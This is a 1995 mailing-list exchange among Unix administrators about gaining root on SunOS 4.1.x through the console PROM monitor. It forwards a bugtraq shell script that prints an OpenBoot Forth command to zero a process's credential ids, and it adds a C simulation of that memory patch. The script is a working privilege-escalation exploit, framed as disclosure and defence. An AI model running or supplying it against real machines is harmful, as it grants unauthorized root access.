>>>>> On Fri, 14 Apr 1995 09:17:25 +0800, patrick@oes.amdahl.com (Patrick Horgan) said:

> Browsing through some archived "bugtraq" messages I discovered a
> really nifty way to change the effective and real userid of any
> process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x).
> That particular hole is demonstrably exploitable under Solaris 2.3
> (and I assume Solaris 2.4), except for one little problem....

ph> I'd have to think...we used to be able to do this via the prom
ph> debugger.

I'll attach the message I found browsing spy.org's Web server at the
end of this one.  It will probably be a good memory refresher.  :-)

ph> We wouldn't have to know any address ahead of time, but
ph> could walk the kernel's tables in the debugger from the prom
ph> prompt.

I'd thought of that, too.  More work, though -- SunOS 4's "pstat" is
so kind as to give almost the exact address needed.

ph> I'd hope everyone knows
ph> that physical security is important, and that if you don't have it
ph> you're in deep doo-doo.

You've got a point there.  At St. Olaf, we've got our machines
"protected" by the root password if you attempt to boot into
single-user mode (and haven't really cared all that much if someone
went to the trouble of bringing their own Sun-style-bootable drive),
but finding out about the monitor attack was a cool (in a twisted
sense) discovery.  "eeprom security-mode=command (?)", here we come.

-Scott
---
Scott E. Lystig Fritchie, UNIX Systems Manager       Co-founder:
Academic Computing Center, St. Olaf College          Twin Cities Free-Net
1510 St. Olaf Ave., Northfield, MN 55057             Organizing Committee
fritchie@stolaf.edu ... 507/646.3407                 (Minneapolis/St. Paul, MN)
"Activism is the killer app for the net." -- Steven Cherry <stc@panix.com>

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

#!/bin/sh -
# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#        PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ "$1x" = x ]; then
	cat - << EOF
Usage: $0 PID
Where PID is the PID of the shell you want to give root to.
Note - for csh the PID is stored in \$\$.
EOF
	exit 1
fi

# This is the start of the proc structure for a given PID, as reported
# by pstat -u (the "procp" field).
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"

# The Forth line printed below does the actual work at the OpenBoot
# "ok" prompt (radix is hex there):
#   b 2 do ... 2 +loop   runs the body with i = 2, 4, 6, 8, a
#   procp ucred + l@     fetches the 32-bit cred pointer out of the proc
#   0 ... i + w!         stores a 16-bit zero at cred + i
# i.e. it zeroes the five 16-bit id fields that follow the reference
# count at the start of the cred structure, without touching offset 0,
# and "go" resumes the kernel with the shell now credentialed as root.
cat - << EOF
On the console press '<L1>a', you should then see the following message:

	Type 'go' to resume
	ok

type the following at the 'ok' prompt:

	b 2 do 0 $procp $ucred + l@ i + w! 2 +loop go

Notes:
	* On some Sun keyboards the '<L1>' key is labeled 'Stop'.
	* There is Emacs-style line editing available at the 'ok' prompt.
EOF
exit 0
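The Forth one-liner in the attached script is terse enough that it is worth seeing what it does to memory step by step. The following C program is an added example, not part of the original post or of fc-4.1.3: it builds a small constructed "kernel memory" image with a proc structure whose cred pointer sits at offset 0x4c (the one value the script takes from the original), then replays the `b 2 do 0 procp ucred + l@ i + w! 2 +loop` loop against it with the Forth words `l@` and `w!` modelled as big-endian 32-bit fetch and 16-bit store, as on SPARC. The addresses PROC_ADDR and CRED_ADDR, the ucred field order and the sample id values are assumptions made for the simulation, chosen to match the offsets the loop touches; they are not taken from a SunOS header.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed "kernel memory" image for the simulation. */
#define KMEM_SIZE   0x400u
static uint8_t kmem[KMEM_SIZE];

/* PROC_ADDR stands in for the procp value "pstat -u PID" prints; CRED_ADDR
 * is where that proc's ucred lives.  Both are arbitrary choices here.
 * UCRED_OFF is the cred-pointer offset used by the script itself. */
#define PROC_ADDR   0x100u
#define CRED_ADDR   0x300u
#define UCRED_OFF   0x4cu

/* Forth memory words, big-endian as on SPARC. */
static uint32_t lfetch(uint32_t a)          /* l@ : 32-bit fetch */
{
    return ((uint32_t)kmem[a] << 24) | ((uint32_t)kmem[a + 1] << 16) |
           ((uint32_t)kmem[a + 2] << 8) | (uint32_t)kmem[a + 3];
}
static uint16_t wfetch(uint32_t a)          /* w@ : 16-bit fetch */
{
    return (uint16_t)(((uint16_t)kmem[a] << 8) | kmem[a + 1]);
}
static void lstore(uint32_t a, uint32_t v)  /* l! : 32-bit store */
{
    kmem[a] = (uint8_t)(v >> 24); kmem[a + 1] = (uint8_t)(v >> 16);
    kmem[a + 2] = (uint8_t)(v >> 8); kmem[a + 3] = (uint8_t)v;
}
static void wstore(uint32_t a, uint16_t v)  /* w! : 16-bit store */
{
    kmem[a] = (uint8_t)(v >> 8); kmem[a + 1] = (uint8_t)v;
}

/* Assumed ucred layout: a 16-bit reference count followed by 16-bit ids.
 * This is what the loop's offsets 2..0xa imply; it is not from a header. */
enum { CR_REF = 0, CR_UID = 2, CR_GID = 4, CR_RUID = 6, CR_RGID = 8,
       CR_SUID = 0xa, CR_SGID = 0xc };

/* Lay out a proc whose cred pointer names an unprivileged credential. */
static void setup(void)
{
    memset(kmem, 0xee, sizeof kmem);            /* junk makes untouched bytes obvious */
    lstore(PROC_ADDR + UCRED_OFF, CRED_ADDR);   /* p_cred -> ucred */
    wstore(CRED_ADDR + CR_REF,  3);             /* cred shared by three processes */
    wstore(CRED_ADDR + CR_UID,  1001);
    wstore(CRED_ADDR + CR_GID,  100);
    wstore(CRED_ADDR + CR_RUID, 1001);
    wstore(CRED_ADDR + CR_RGID, 100);
    wstore(CRED_ADDR + CR_SUID, 1001);
    wstore(CRED_ADDR + CR_SGID, 100);
}

/*   b 2 do 0 procp ucred + l@ i + w! 2 +loop
 * "b 2 do ... 2 +loop" runs i = 2, 4, 6, 8, a (the limit 0xb is exclusive).
 * Each pass fetches the cred pointer with l@ and stores a 16-bit zero at
 * cred + i with w!.  Offset 0 (the reference count) is never written, and
 * the loop stops before 0xc, so the last field is left alone too. */
static void forth_patch(uint32_t procp, uint32_t ucred_off)
{
    for (uint32_t i = 2; i < 0xb; i += 2)
        wstore(lfetch(procp + ucred_off) + i, 0);
}

/* Run the simulation.  Returns how many of the five id fields the loop
 * zeroed; *ref_out and *sgid_out receive the fields the loop skips. */
int run_demo(uint16_t *ref_out, uint16_t *sgid_out)
{
    setup();
    forth_patch(PROC_ADDR, UCRED_OFF);
    uint32_t cred = lfetch(PROC_ADDR + UCRED_OFF);
    const int ids[] = { CR_UID, CR_GID, CR_RUID, CR_RGID, CR_SUID };
    int zeroed = 0;
    for (size_t k = 0; k < sizeof ids / sizeof ids[0]; k++)
        zeroed += (wfetch(cred + (uint32_t)ids[k]) == 0);
    if (ref_out)  *ref_out  = wfetch(cred + CR_REF);
    if (sgid_out) *sgid_out = wfetch(cred + CR_SGID);
    return zeroed;
}

int main(void)
{
    uint16_t ref, sgid;
    int n = run_demo(&ref, &sgid);
    printf("zeroed %d of 5 id fields; cr_ref=%u and cr_sgid=%u untouched\n",
           n, ref, sgid);
    return 0;
}
```

Running it shows all five id fields at 0 while the reference count keeps its value, which is why the patched process keeps working after `go`: the kernel's bookkeeping for the shared cred is intact and only the identity it records has changed. The defensive takeaway is the one Scott draws above: nothing in the kernel can check for this, so the monitor has to be password-protected or the console physically secured.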